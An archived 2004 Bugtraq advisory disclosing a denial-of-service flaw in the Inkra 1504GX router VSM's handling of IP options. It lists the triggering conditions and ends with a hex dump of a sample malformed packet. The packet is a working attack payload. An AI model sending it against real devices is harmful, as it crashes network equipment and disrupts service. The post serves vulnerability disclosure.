| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20040914031138.4506.qmail@www.securityfocus.com> Date: 14 Sep 2004 03:11:38 -0000 From: felix zhou <felix__zhou@...mail.com> To: bugtraq@...urityfocus.com Subject: Inkra 1504GX DoS vulnerability in conducting IP protocol Inkra 1504GX DoS vulnerability in conducting IP protocol Author:  Felix Zhou(felix__zhou@...mail.com)       Song Liu (songsong@...w.ca) Release date: 2004-08-25 Affected system:   Inkra 1504GX with router VSM release 2.1.4.b003 (didn't test other products of Inkra). Detail: Inkra 1504GX's router VSM(release 2.1.4.b003) does not conduct IP options properly. And Hackers can construct some kind of packet to make it crash down. Fortunately, such situation happens only in the following prerequisites: 1. Router VSM is selected in actived VR. 2. Between Router VSM and the VP, no other VSMs exist. 3. The VP is connected to the IO slot directly. To make the SPM crash down, you have to send the malformed packet at least 3 times, which is uncertain for you to perform. Several seconds interval is necessary between the attacks. --------------- a packet example --------------------------- xx xx xx xx xx xx (DMAC) xx xx xx xx xx xx (SMAC) 08 00 4e cc 00 58 15 24 00 00 56 01 xx xx (ip-csum) xx xx xx xx (SIP) xx xx xx xx (DIP) eb 21 ad a6 eb e1 35 9b ce dd a7 11 ea 5d c5 96 af 47 c1 50 f1 d1 5c 4b 18 9a c1 8a 13 6b 48 5e 74 83 c6 06 aa 9a 5e c2 a6 75 38 44 f8 43 d7 3f ae a1 e0 c6 e3 7c 4b 59 7a 95 1e 70 cc 04 1b 2a d1 6e 38 83 -----------------------------------------------------------------
Powered by blists - more mailing lists